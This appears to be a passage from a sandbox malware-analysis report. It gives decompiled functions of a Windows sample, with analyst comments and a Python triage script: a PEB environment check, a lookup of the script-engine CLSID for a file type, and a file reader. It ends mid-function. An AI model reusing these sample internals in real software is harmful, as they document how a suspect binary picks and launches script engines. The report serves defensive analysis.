                                                  								}
                                                  								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                                  								if(_t228 != 0) {
                                                  									goto L78;
                                                  								}
                                                  								goto L47;
                                                  							}
                                                  							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                                  							if(_t299 == 0) {
                                                  								L36:
                                                  								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                                  								if(_t301 == 0) {
                                                  									L38:
                                                  									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                                  									if(_t303 == 0) {
                                                  										L40:
                                                  										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                                  										if(_t228 != 0) {
                                                  											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  										}
                                                  										goto L43;
                                                  									}
                                                  									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                  									if(_t228 != 0) {
                                                  										goto L78;
                                                  									}
                                                  									goto L40;
                                                  								}
                                                  								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                  								if(_t228 != 0) {
                                                  									goto L78;
                                                  								}
                                                  								goto L38;
                                                  							}
                                                  							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                  							if(_t228 != 0) {
                                                  								goto L78;
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                                  						if(_t305 == 0) {
                                                  							L25:
                                                  							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                                  							if(_t307 == 0) {
                                                  								L27:
                                                  								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                                  								if(_t309 == 0) {
                                                  									L29:
                                                  									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                                  									if(_t228 != 0) {
                                                  										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  									}
                                                  									goto L32;
                                                  								}
                                                  								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                  								if(_t228 != 0) {
                                                  									goto L78;
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                  							if(_t228 != 0) {
                                                  								goto L78;
                                                  							}
                                                  							goto L27;
                                                  						}
                                                  						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                  						if(_t228 != 0) {
                                                  							goto L78;
                                                  						}
                                                  						goto L25;
                                                  					}
                                                  					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                                  					if(_t311 == 0) {
                                                  						L14:
                                                  						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                                  						if(_t313 == 0) {
                                                  							L16:
                                                  							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                                  							if(_t315 == 0) {
                                                  								L18:
                                                  								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                                  								if(_t228 != 0) {
                                                  									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  								}
                                                  								goto L21;
                                                  							}
                                                  							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                  							if(_t228 != 0) {
                                                  								goto L78;
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                  						if(_t228 != 0) {
                                                  							goto L78;
                                                  						}
                                                  						goto L16;
                                                  					}
                                                  					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                  					if(_t228 != 0) {
                                                  						goto L78;
                                                  					}
                                                  					goto L14;
                                                  				}
                                                  				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                  				if(_t317 == 0) {
                                                  					L3:
                                                  					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                                  					if(_t319 == 0) {
                                                  						L5:
                                                  						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                                  						if(_t321 == 0) {
                                                  							L7:
                                                  							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                                  							if(_t228 != 0) {
                                                  								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                  							}
                                                  							goto L10;
                                                  						}
                                                  						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                  						if(_t228 != 0) {
                                                  							goto L78;
                                                  						}
                                                  						goto L7;
                                                  					}
                                                  					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                  					if(_t228 != 0) {
                                                  						goto L78;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                  				if(_t228 != 0) {
                                                  					goto L78;
                                                  				}
                                                  				goto L3;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
• Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 30be2794807ce81a932dc9e1826ad67b1c6955bdd746b6622a3b8c94bfd516e3
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: E0C1B33320905349DF5D4A39843017FBEA55EA17B231A07BED4F2EB2C4EE38D7689614
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                  • Instruction ID: 45893cfc2110a2cd1a96551fe2a68993f6149343a10e5061ae246f5beab2331f
                                                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                                  • Instruction Fuzzy Hash: 4F110676A00108AFDB50DFA9C88486DF7FEFF58654B504069ED19D3315F3709E40C660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                  • Instruction ID: 29738e4e81c19f0bc247b806ffd13fca69ed15e5ece2bd3c358d62a28e0bc5b7
                                                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                                  • Instruction Fuzzy Hash: 21E012397A46499FC794CBA8C841D15B3F9EB0D760B154294FD25C73A1E734EE00DA50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction ID: 671c5bf52f290c6b03d29a6d05358e14a92ca35f2a5dafb6d0de2e6f608615de
                                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                  • Instruction Fuzzy Hash: 0BE0863A751650CFC3A0DA59C480D56F3E9EB8C2B07164479EA69D3716D330FC00C650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			// Reads the PEB through fs:[0x30], follows PEB->ProcessParameters (+0x10) and
                                                  			// tests the dword at offset 8 of that block. Returns 1 when that dword is
                                                  			// negative, or when E00409013 does not report 1 through its out-parameter;
                                                  			// otherwise returns 0. _t16 is used but never declared: this is decompiler
                                                  			// output and is left as the sandbox produced it.
                                                  			E004081DD(void* __ecx) {
                                                  				char _v8;
                                                  				intOrPtr _t7;
                                                  				char _t13;
                                                  
                                                  				_t13 = 0;
                                                  				_v8 = 0;
                                                  				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));   // PEB->ProcessParameters
                                                  				_t16 =  *((intOrPtr*)(_t7 + 8));               // dword at ProcessParameters+8
                                                  				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                                  					L2:
                                                  					_t13 = 1;
                                                  				} else {
                                                  					E00409013(_t16,  &_v8);                     // fills _v8; 1 means "ok"
                                                  					if(_v8 != 1) {
                                                  						goto L2;
                                                  					}
                                                  				}
                                                  				return _t13;
                                                  			}
                                                  
                                                  Disassembly listing not captured; only the address column survived, spanning 0x004081ea to 0x0040820d.

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1309330b26bbd4996c8968a0efc670034eac60ab60495bc0805cbd69c1388f86
                                                  • Instruction ID: 70ebf834586dc0c3d3b7384857c130d04f94947386e354d864e975431442ecd0
                                                  • Opcode Fuzzy Hash: 1309330b26bbd4996c8968a0efc670034eac60ab60495bc0805cbd69c1388f86
                                                  • Instruction Fuzzy Hash: 72E08C32911228EBCB24DB89CA0498AF3ECEB84B04B1140AFB511E3242C674DE00CBD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			// Resolves a script engine CLSID from a file-type key, the same chain Windows
                                                  			// Script Host walks when it picks an engine for an extension:
                                                  			//   HKCR\<_a4>                  (default) -> file-type ProgID, e.g. "VBSFile"
                                                  			//   HKCR\<ProgID>\ScriptEngine  (default) -> engine ProgID,    e.g. "VBScript"
                                                  			//   CLSIDFromProgID(engine)     -> CLSID written to *_a8
                                                  			// 0x80000000 is HKEY_CLASSES_ROOT. _v152 and _v280 are wide-char buffers that
                                                  			// the decompiler shows as a single short. Returns 1 on success, 0 otherwise.
                                                  			E004011C0(short* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				short* _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				short _v152;
                                                  				short _v280;
                                                  				long _t40;
                                                  
                                                  				_v8 = RegOpenKeyW(0x80000000, _a4,  &_v12);            // HKCR\<_a4>
                                                  				if(_v8 == 0) {
                                                  					_v8 = RegQueryValueW(_v12, 0,  &_v152,  &_v20);     // default value -> ProgID
                                                  					RegCloseKey(_v12);
                                                  					if(_v8 == 0) {
                                                  						lstrcatW( &_v152, L"\\ScriptEngine");
                                                  						_v8 = RegOpenKeyW(0x80000000,  &_v152,  &_v12);  // HKCR\<ProgID>\ScriptEngine
                                                  						if(_v8 == 0) {
                                                  							_v8 = RegQueryValueW(_v12, 0,  &_v280,  &_v20); // default value -> engine ProgID
                                                  							_t40 = RegCloseKey(_v12);
                                                  							if(_v8 == 0) {
                                                  								__imp__CLSIDFromProgID( &_v280, _a8);
                                                  								// _t40 here is the HRESULT CLSIDFromProgID left in eax, not the
                                                  								// RegCloseKey result the decompiler reused the temporary for.
                                                  								_v24 = _t40;
                                                  								if(_v24 < 0) {                               // FAILED(hr)
                                                  									_v16 = 0;
                                                  								} else {
                                                  									_v16 = 1;
                                                  								}
                                                  								return _v16;
                                                  							}
                                                  							return 0;
                                                  						}
                                                  						return 0;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}
                                                  
                                                  Disassembly listing not captured; only the address column survived, spanning 0x004011dc to 0x004012aa.

                                                  APIs
                                                  • RegOpenKeyW.ADVAPI32(80000000,?,?), ref: 004011D6
                                                  • RegQueryValueW.ADVAPI32(?,00000000,?,?), ref: 004011FD
                                                  • RegCloseKey.ADVAPI32(?), ref: 0040120A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: \ScriptEngine
                                                  • API String ID: 3677997916-4133095719
                                                  • Opcode ID: a89d4df85d6b9e36a099648a8f152397b7df53a3883837d5ce00e7a505109de5
                                                  • Instruction ID: b1b0978277b733587fd6350f7c9f4209b09e7cd3a31cfb2b49838eb73817f5ed
                                                  • Opcode Fuzzy Hash: a89d4df85d6b9e36a099648a8f152397b7df53a3883837d5ce00e7a505109de5
                                                  • Instruction Fuzzy Hash: 6531D975900208EFDB14DBE0CA48BEEB7B8AB48305F1084BAE606B7590D7785A49DB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
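The registry walk in E004011C0 is the chain Windows Script Host uses to pick an engine for a file extension. As an added analyst check, not part of this report or of the sample, the Python below performs the same three steps over a constructed stand-in for HKEY_CLASSES_ROOT (the key layout and the VBScript/JScript engine CLSIDs mirror a default Windows install; `FAKE_HKCR`, `resolve_script_engine` and the two reader helpers are assumptions of this example), and can run the identical walk against the live registry with `winreg` on Windows. The third step reproduces what CLSIDFromProgID does internally, which is to read HKCR\<engine ProgID>\CLSID.

```python
"""Walk the HKCR\\<ext> -> \\ScriptEngine -> CLSID chain that E004011C0 performs.

Runs offline over a constructed registry table; on Windows, winreg_reader()
runs the same walk against the real HKEY_CLASSES_ROOT.
"""
from typing import Callable, Dict, Optional

Reader = Callable[[str], Optional[str]]

# Constructed stand-in for HKEY_CLASSES_ROOT: subkey path -> (Default) value.
# Layout and the two engine CLSIDs mirror a default install; .txt is present
# to show a file type with no ScriptEngine subkey.
FAKE_HKCR: Dict[str, str] = {
    r".vbs": "VBSFile",
    r"VBSFile\ScriptEngine": "VBScript",
    r"VBScript\CLSID": "{B54F3741-5B07-11CF-A4B0-00AA004A55E8}",
    r".js": "JSFile",
    r"JSFile\ScriptEngine": "JScript",
    r"JScript\CLSID": "{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}",
    r".txt": "txtfile",
}


def dict_reader(table: Dict[str, str]) -> Reader:
    """Reader over the constructed table; key names are case-insensitive like the registry."""
    lowered = {k.lower(): v for k, v in table.items()}
    return lambda subkey: lowered.get(subkey.lower())


def winreg_reader() -> Reader:
    """Reader over the live HKEY_CLASSES_ROOT (Windows only).

    winreg.QueryValue returns the unnamed (Default) value of a subkey, which is
    exactly what the sample's RegQueryValueW(hKey, NULL, ...) calls retrieve.
    """
    import winreg  # assumption: only importable on Windows

    def read(subkey: str) -> Optional[str]:
        try:
            value = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, subkey)
        except OSError:
            return None
        return value or None

    return read


def resolve_script_engine(ext_or_progid: str, read: Reader) -> Optional[Dict[str, str]]:
    """Mirror E004011C0; return None wherever the sample returns 0.

    Step 1: HKCR\\<x>                 -> file-type ProgID   (first RegQueryValueW)
    Step 2: HKCR\\<ProgID>\\ScriptEngine -> engine ProgID  (lstrcatW + second query)
    Step 3: HKCR\\<engine>\\CLSID     -> CLSID             (what CLSIDFromProgID reads)
    """
    progid = read(ext_or_progid)
    if not progid:
        return None
    engine = read(progid + r"\ScriptEngine")
    if not engine:
        return None
    clsid = read(engine + r"\CLSID")
    if not clsid:
        return None
    return {"progid": progid, "engine": engine, "clsid": clsid}


if __name__ == "__main__":
    reader = dict_reader(FAKE_HKCR)
    for key in (".vbs", ".js", ".txt", ".exe"):
        print(key, "->", resolve_script_engine(key, reader))
```

HKEY_CLASSES_ROOT is a merged view of HKLM\Software\Classes and HKCU\Software\Classes, with the per-user hive taking precedence, so on a host being triaged the same walk should also be run with a reader pointed at HKCU\Software\Classes to see whether a user-writable ScriptEngine or CLSID entry would change which engine the sample instantiates.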

                                                  C-Code - Quality: 87%
                                                  			// Reads a whole file and returns it as a wide-character BSTR (or 0):
                                                  			// CreateFileW with GENERIC_READ (0x80000000), OPEN_EXISTING (3) and
                                                  			// FILE_ATTRIBUTE_READONLY (1); CreateFileMappingW with PAGE_READONLY (2);
                                                  			// MapViewOfFile with FILE_MAP_READ (4); MultiByteToWideChar(CP_ACP, ...)
                                                  			// twice, first to size the buffer, then to convert into a BSTR allocated
                                                  			// through oleaut32 ordinal 4 (SysAllocStringLen).
                                                  			E004012C0(WCHAR* _a4) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				int _v20;
                                                  				long _v24;
                                                  				short* _v28;
                                                  				int _t34;
                                                  
                                                  				_v8 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 1, 0);
                                                  				if(_v8 != 0xffffffff) {                                  // INVALID_HANDLE_VALUE
                                                  					_v24 = GetFileSize(_v8, 0);
                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                  					CloseHandle(_v8);
                                                  					// CreateFileMappingW returns NULL on failure, not INVALID_HANDLE_VALUE,
                                                  					// so this comparison never catches a failed mapping.
                                                  					if(_v16 != 0xffffffff) {
                                                  						_v12 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                  						CloseHandle(_v16);                                // view stays valid
                                                  						if(_v12 != 0) {
                                                  							_t34 = MultiByteToWideChar(0, 0, _v12, _v24, 0, 0); // required length
                                                  							_v20 = _t34;
                                                  							__imp__#4(0, _v20);                               // SysAllocStringLen(NULL, len)
                                                  							_v28 = _t34;                                      // actually the BSTR returned in eax
                                                  							MultiByteToWideChar(0, 0, _v12, _v24, _v28, _v20);
                                                  							UnmapViewOfFile(_v12);
                                                  							return _v28;
                                                  						}
                                                  						return 0;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}
                                                  
                                                  Disassembly listing not captured; only the address column survived, spanning 0x004012df to 0x0040139e.

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000001,00000000), ref: 004012D9
                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 004012F5
                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040130C
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00401319
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: File$Create$CloseHandleMappingSize
                                                  • String ID:
                                                  • API String ID: 3089540790-0
                                                  • Opcode ID: 9e517d1670e694e13b417871d4e36ae5018fb6c5d8b7fa4c11f8a853eb3cd9bd
                                                  • Instruction ID: 1df6038d868c7a6418a881a98720ad6b1c570608c67974a8479cbace5be712d5
                                                  • Opcode Fuzzy Hash: 9e517d1670e694e13b417871d4e36ae5018fb6c5d8b7fa4c11f8a853eb3cd9bd
                                                  • Instruction Fuzzy Hash: AE312D74E40208FFEB20DBE4DD46FAEB7B4AB48701F208575FA15F66D0C6746A409B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			// Statically linked MSVC runtime code, not sample-specific logic: the UCRT
                                                  			// try_get_first_available_module() thunk loader. It walks a list of module
                                                  			// ids from _a4 to _a8, keeps loaded handles in the table at 0x416310 (0 =
                                                  			// not tried, -1 = load failed) and takes module names from 0x410850.
                                                  			// 0x800 is LOAD_LIBRARY_SEARCH_SYSTEM32; 0x57 is ERROR_INVALID_PARAMETER,
                                                  			// which older loaders return for that flag, so names that do not start
                                                  			// with "api-ms-" or "ext-ms-" are retried with flags 0. E00408950 is a
                                                  			// wcsncmp-style compare over 7 characters.
                                                  			E00408EC9(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                  				signed int* _v8;
                                                  				void** _t12;
                                                  				void* _t16;
                                                  				void* _t18;
                                                  				signed int _t22;
                                                  				WCHAR* _t23;
                                                  				void** _t26;
                                                  				signed int* _t29;
                                                  				void* _t32;
                                                  				void* _t34;
                                                  
                                                  				_t29 = _a4;
                                                  				while(_t29 != _a8) {
                                                  					_t22 =  *_t29;                                   // module id
                                                  					_t12 = 0x416310 + _t22 * 4;                      // cached handle slot
                                                  					_t32 =  *_t12;
                                                  					_v8 = _t12;
                                                  					if(_t32 == 0) {
                                                  						_t23 =  *(0x410850 + _t22 * 4);              // module name
                                                  						_t32 = LoadLibraryExW(_t23, 0, 0x800);       // LOAD_LIBRARY_SEARCH_SYSTEM32
                                                  						if(_t32 != 0) {
                                                  							L12:
                                                  							// In the CRT source this is an interlocked exchange on the slot; if
                                                  							// another thread already cached a handle, the duplicate reference is
                                                  							// released. The decompiler shows only the store.
                                                  							_t26 = _v8;
                                                  							 *_t26 = _t32;
                                                  							if( *_t26 != 0) {
                                                  								FreeLibrary(_t32);
                                                  							}
                                                  							L14:
                                                  							if(_t32 != 0) {
                                                  								_t16 = _t32;
                                                  								L18:
                                                  								return _t16;
                                                  							}
                                                  							L15:
                                                  							_t29 =  &(_t29[1]);                      // next module id
                                                  							continue;
                                                  						}
                                                  						_t18 = GetLastError();
                                                  						if(_t18 != 0x57) {                           // ERROR_INVALID_PARAMETER
                                                  							L9:
                                                  							_t32 = 0;
                                                  							L10:
                                                  							if(_t32 != 0) {
                                                  								goto L12;
                                                  							}
                                                  							 *_v8 = _t18 | 0xffffffff;               // cache -1: load failed
                                                  							goto L15;
                                                  						}
                                                  						_t18 = E00408950(_t23, L"api-ms-", 7);       // API set names get no fallback
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = E00408950(_t23, L"ext-ms-", 7);
                                                  						_t34 = _t34 + 0xc;
                                                  						if(_t18 == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t18 = LoadLibraryExW(_t23, _t32, _t32);     // retry with flags 0 (_t32 is 0 here)
                                                  						_t32 = _t18;
                                                  						goto L10;
                                                  					}
                                                  					if(_t32 == 0xffffffff) {                         // earlier load failed; skip
                                                  						goto L15;
                                                  					}
                                                  					goto L14;
                                                  				}
                                                  				_t16 = 0;
                                                  				goto L18;
                                                  			}
                                                  
                                                  Disassembly listing not captured; only the address column survived, spanning 0x00408ed2 to 0x00408f8c.

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: 9156bbfc067df576f8a8dfd647e4eccbe74487dc4a1fd8c3b45c59caeb10470d
                                                  • Instruction ID: 58e31c0ee6054dad396b0b535bd9a6941ebe04213d74b6dd0a57fb4da420e811
                                                  • Opcode Fuzzy Hash: 9156bbfc067df576f8a8dfd647e4eccbe74487dc4a1fd8c3b45c59caeb10470d
                                                  • Instruction Fuzzy Hash: 69212631A05222ABD7315A34AE40B5B37659B057A0F25053AFD85B73D1DE38ED0186DC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E0040AB38(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                  				signed int _v8;
                                                  				char _v16;
                                                  				char _v23;
                                                  				char _v24;
                                                  				void _v32;
                                                  				signed int _v33;
                                                  				long _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				char _v51;
                                                  				void _v52;
                                                  				long _v56;
                                                  				char _v60;
                                                  				intOrPtr _v68;
                                                  				char _v72;
                                                  				struct _OVERLAPPED* _v76;
                                                  				signed int _v80;
                                                  				signed int _v84;
                                                  				signed int _v88;
                                                  				long _v92;
                                                  				intOrPtr _v96;
                                                  				long _v100;
                                                  				signed char* _v104;
                                                  				signed char* _v108;
                                                  				void* _v112;
                                                  				intOrPtr _v116;
                                                  				char _v120;
                                                  				int _v124;
                                                  				intOrPtr _v128;
                                                  				struct _OVERLAPPED* _v132;
                                                  				struct _OVERLAPPED* _v136;
                                                  				struct _OVERLAPPED* _v140;
                                                  				struct _OVERLAPPED* _v144;
                                                  				signed int _t170;
                                                  				signed int _t172;
                                                  				int _t178;
                                                  				intOrPtr _t183;
                                                  				intOrPtr _t186;
                                                  				void* _t188;
                                                  				void* _t190;
                                                  				long _t193;
                                                  				void _t198;
                                                  				signed char* _t202;
                                                  				void* _t206;
                                                  				struct _OVERLAPPED* _t211;
                                                  				void* _t220;
                                                  				long _t224;
                                                  				intOrPtr _t225;
                                                  				char _t227;
                                                  				void* _t237;
                                                  				struct _OVERLAPPED* _t242;
                                                  				signed int _t244;
                                                  				intOrPtr _t247;
                                                  				signed int _t250;
                                                  				signed int _t251;
                                                  				signed int _t253;
                                                  				intOrPtr _t255;
                                                  				void* _t261;
                                                  				intOrPtr _t262;
                                                  				signed int _t263;
                                                  				signed int _t266;
                                                  				signed char _t267;
                                                  				intOrPtr _t270;
                                                  				signed int _t272;
                                                  				long _t273;
                                                  				signed int _t274;
                                                  				signed char* _t277;
                                                  				signed int _t280;
                                                  				signed int _t282;
                                                  				signed int _t286;
                                                  				signed int _t287;
                                                  				intOrPtr _t288;
                                                  				signed int _t289;
                                                  				struct _OVERLAPPED* _t291;
                                                  				struct _OVERLAPPED* _t293;
                                                  				signed int _t294;
                                                  				void* _t295;
                                                  				void* _t296;
                                                  
                                                  				_t170 =  *0x4150a8; // 0x90cea005
                                                  				_v8 = _t170 ^ _t294;
                                                  				_t172 = _a8;
                                                  				_t266 = _t172 >> 6;
                                                  				_t244 = (_t172 & 0x0000003f) * 0x38;
                                                  				_t277 = _a12;
                                                  				_v108 = _t277;
                                                  				_v80 = _t266;
                                                  				_v112 =  *((intOrPtr*)(_t244 +  *((intOrPtr*)(0x416108 + _t266 * 4)) + 0x18));
                                                  				_v44 = _t244;
                                                  				_v96 = _a16 + _t277;
                                                  				_t178 = GetConsoleOutputCP();
                                                  				_t242 = 0;
                                                  				_v124 = _t178;
                                                  				E0040689E( &_v72, _t266, 0);
                                                  				_t282 = 0;
                                                  				_v92 = 0;
                                                  				_v88 = 0;
                                                  				_v84 = 0;
                                                  				_t247 =  *((intOrPtr*)(_v68 + 8));
                                                  				_v128 = _t247;
                                                  				_v104 = _t277;
                                                  				if(_t277 >= _v96) {
                                                  					L48:
                                                  					__eflags = _v60 - _t242;
                                                  				} else {
                                                  					while(1) {
                                                  						_t250 = _v44;
                                                  						_v51 =  *_t277;
                                                  						_v76 = _t242;
                                                  						_v40 = 1;
                                                  						_t186 =  *((intOrPtr*)(0x416108 + _v80 * 4));
                                                  						_v48 = _t186;
                                                  						if(_t247 != 0xfde9) {
                                                  							goto L19;
                                                  						}
                                                  						_t211 = _t242;
                                                  						_t270 = _v48 + 0x2e + _t250;
                                                  						_v116 = _t270;
